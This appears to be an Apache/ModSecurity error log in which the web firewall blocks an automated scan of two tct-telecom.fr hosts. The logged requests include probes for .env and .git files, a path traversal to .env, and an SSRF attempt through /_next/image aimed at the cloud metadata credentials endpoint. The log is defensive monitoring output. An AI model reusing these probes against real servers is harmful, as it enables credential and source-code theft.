[Mon May 11 15:23:16.438913 2026] [security2:error] [pid 1320398:tid 1320420] [client 195.178.110.133:3294] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYROJEyNRN152ArOSNFQAAAFQ"]
[Mon May 11 15:23:16.439081 2026] [security2:error] [pid 1320398:tid 1320420] [client 195.178.110.133:3294] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYROJEyNRN152ArOSNFQAAAFQ"]
[Mon May 11 15:23:16.439324 2026] [security2:error] [pid 1320398:tid 1320420] [client 195.178.110.133:3294] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYROJEyNRN152ArOSNFQAAAFQ"]
[Mon May 11 15:23:16.457493 2026] [security2:error] [pid 1320398:tid 1320420] [client 195.178.110.133:3294] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYROJEyNRN152ArOSNFgAAAFQ"]
[Mon May 11 15:23:16.457681 2026] [security2:error] [pid 1320398:tid 1320420] [client 195.178.110.133:3294] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYROJEyNRN152ArOSNFgAAAFQ"]
[Mon May 11 15:23:16.457912 2026] [security2:error] [pid 1320398:tid 1320420] [client 195.178.110.133:3294] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYROJEyNRN152ArOSNFgAAAFQ"]
[Mon May 11 15:23:16.459630 2026] [proxy_fcgi:error] [pid 1319998:tid 1320011] [client 195.178.110.133:3354] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:16.481669 2026] [proxy_fcgi:error] [pid 1319998:tid 1320011] [client 195.178.110.133:3354] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:16.482011 2026] [security2:error] [pid 1319885:tid 1319918] [client 195.178.110.133:3340] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYRFchVQ3tCn0m9OpZVAAAARA"]
[Mon May 11 15:23:16.482207 2026] [security2:error] [pid 1319885:tid 1319918] [client 195.178.110.133:3340] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYRFchVQ3tCn0m9OpZVAAAARA"]
[Mon May 11 15:23:16.482431 2026] [security2:error] [pid 1319885:tid 1319918] [client 195.178.110.133:3340] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYRFchVQ3tCn0m9OpZVAAAARA"]
[Mon May 11 15:23:16.499647 2026] [proxy_fcgi:error] [pid 1319886:tid 1319916] [client 195.178.110.133:3272] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:16.501051 2026] [security2:error] [pid 1319885:tid 1319918] [client 195.178.110.133:3340] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYRFchVQ3tCn0m9OpZVQAAARA"]
[Mon May 11 15:23:16.501362 2026] [security2:error] [pid 1319885:tid 1319918] [client 195.178.110.133:3340] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYRFchVQ3tCn0m9OpZVQAAARA"]
[Mon May 11 15:23:16.501609 2026] [security2:error] [pid 1319885:tid 1319918] [client 195.178.110.133:3340] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYRFchVQ3tCn0m9OpZVQAAARA"]
[Mon May 11 15:23:16.519333 2026] [proxy_fcgi:error] [pid 1319886:tid 1319916] [client 195.178.110.133:3272] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:16.539633 2026] [proxy_fcgi:error] [pid 1319886:tid 1319916] [client 195.178.110.133:3272] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:16.569931 2026] [proxy_fcgi:error] [pid 1319886:tid 1319916] [client 195.178.110.133:3272] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:16.641100 2026] [security2:error] [pid 1320398:tid 1320423] [client 195.178.110.133:3514] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /storage/app/../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "portail.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYROJEyNRN152ArOSNGQAAAFc"]
[Mon May 11 15:23:16.641195 2026] [security2:error] [pid 1320398:tid 1320423] [client 195.178.110.133:3514] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYROJEyNRN152ArOSNGQAAAFc"]
[Mon May 11 15:23:16.641356 2026] [security2:error] [pid 1320398:tid 1320423] [client 195.178.110.133:3514] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYROJEyNRN152ArOSNGQAAAFc"]
[Mon May 11 15:23:16.642171 2026] [security2:error] [pid 1319886:tid 1319917] [client 195.178.110.133:3684] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agHYRKy-5-wpj6Sx56aY8AAAAAw"]
[Mon May 11 15:23:16.642299 2026] [security2:error] [pid 1319886:tid 1319917] [client 195.178.110.133:3684] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agHYRKy-5-wpj6Sx56aY8AAAAAw"]
[Mon May 11 15:23:16.642722 2026] [security2:error] [pid 1319886:tid 1319917] [client 195.178.110.133:3684] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agHYRKy-5-wpj6Sx56aY8AAAAAw"]
[Mon May 11 15:23:16.643303 2026] [security2:error] [pid 1320398:tid 1320423] [client 195.178.110.133:3514] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYROJEyNRN152ArOSNGQAAAFc"]
[Mon May 11 15:23:16.648719 2026] [security2:error] [pid 1320674:tid 1320708] [client 195.178.110.133:3648] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYRKO9RdIr1DwxYR2S8gAAANM"]
[Mon May 11 15:23:16.648848 2026] [security2:error] [pid 1320674:tid 1320708] [client 195.178.110.133:3648] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYRKO9RdIr1DwxYR2S8gAAANM"]
[Mon May 11 15:23:16.649050 2026] [security2:error] [pid 1320674:tid 1320708] [client 195.178.110.133:3648] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYRKO9RdIr1DwxYR2S8gAAANM"]
[Mon May 11 15:23:16.656003 2026] [security2:error] [pid 1319885:tid 1319925] [client 195.178.110.133:3610] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "portail.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYRFchVQ3tCn0m9OpZWgAAARM"]
[Mon May 11 15:23:16.656775 2026] [security2:error] [pid 1319885:tid 1319925] [client 195.178.110.133:3610] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYRFchVQ3tCn0m9OpZWgAAARM"]
[Mon May 11 15:23:16.659384 2026] [security2:error] [pid 1319885:tid 1319925] [client 195.178.110.133:3610] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYRFchVQ3tCn0m9OpZWgAAARM"]
[Mon May 11 15:23:16.660680 2026] [security2:error] [pid 1320398:tid 1320423] [client 195.178.110.133:3514] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/index"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/.git/index"] [unique_id "agHYROJEyNRN152ArOSNHQAAAFc"]
[Mon May 11 15:23:16.660800 2026] [security2:error] [pid 1320398:tid 1320423] [client 195.178.110.133:3514] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/.git/index"] [unique_id "agHYROJEyNRN152ArOSNHQAAAFc"]
[Mon May 11 15:23:16.660987 2026] [security2:error] [pid 1320398:tid 1320423] [client 195.178.110.133:3514] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/.git/index"] [unique_id "agHYROJEyNRN152ArOSNHQAAAFc"]
[Mon May 11 15:23:16.666543 2026] [security2:error] [pid 1320398:tid 1320405] [client 195.178.110.133:3622] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/.git/logs/HEAD"] [unique_id "agHYROJEyNRN152ArOSNHgAAAEU"]
[Mon May 11 15:23:16.666681 2026] [security2:error] [pid 1320398:tid 1320405] [client 195.178.110.133:3622] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/.git/logs/HEAD"] [unique_id "agHYROJEyNRN152ArOSNHgAAAEU"]
[Mon May 11 15:23:16.666804 2026] [security2:error] [pid 1320398:tid 1320408] [client 195.178.110.133:3658] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYROJEyNRN152ArOSNHwAAAEg"]
[Mon May 11 15:23:16.666923 2026] [security2:error] [pid 1320398:tid 1320408] [client 195.178.110.133:3658] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYROJEyNRN152ArOSNHwAAAEg"]
[Mon May 11 15:23:16.667044 2026] [security2:error] [pid 1320398:tid 1320405] [client 195.178.110.133:3622] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/.git/logs/HEAD"] [unique_id "agHYROJEyNRN152ArOSNHgAAAEU"]
[Mon May 11 15:23:16.667113 2026] [security2:error] [pid 1320398:tid 1320408] [client 195.178.110.133:3658] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYROJEyNRN152ArOSNHwAAAEg"]
[Mon May 11 15:23:16.667629 2026] [security2:error] [pid 1320398:tid 1320414] [client 195.178.110.133:3632] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agHYROJEyNRN152ArOSNIAAAAE4"]
[Mon May 11 15:23:16.667763 2026] [security2:error] [pid 1320398:tid 1320414] [client 195.178.110.133:3632] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agHYROJEyNRN152ArOSNIAAAAE4"]
[Mon May 11 15:23:16.668003 2026] [security2:error] [pid 1320398:tid 1320414] [client 195.178.110.133:3632] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agHYROJEyNRN152ArOSNIAAAAE4"]
